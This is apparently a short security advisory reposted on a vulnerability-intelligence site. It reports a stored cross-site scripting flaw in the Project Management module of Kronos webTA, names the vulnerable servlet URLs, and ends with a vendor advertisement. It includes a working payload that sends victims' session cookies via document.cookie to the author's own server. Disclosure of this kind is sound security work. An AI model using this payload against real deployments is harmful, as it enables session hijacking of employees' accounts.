Limited security review of webTA: XSS vulnerability in Project Management module, potential existance in Vacation/Sick Leave Request modul
`http://www.kronos.com/Products/webTA.htm
webTA is used by thousands of fed. employees.
I did a limited security review of a couple deployments. Because of certain
contractual limitations I have been able to verify XSS in its Project
Management module only, but I suspect it also exists in Vacation/Sick Leave
Request module.
URLs: /servlet/com.threeis.webta.H710selProject and
/servlet/com.threeis.webta.H720editProjectInfo
Use these URLs to create project descriptions. No hex or html encoding or
anything fancy is necessary. Just type in the description field your favorite
XSS stuff - it will work.
I tested basic font changing html tags (<font color="red">test for
XSS</font>), and JavaScript (<script>document.write('<img
src="http://ip_of_my_server_on_my_laptop/cookie.cgi?'+document.cookie+'">')</
script>). On my laptop I had Apache listening, and collecting user session
information into its logs.
Yeah, it is remote, in case you are wondering.
I no longer have the access to any webTA systems, and cannot verify anything
else.
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo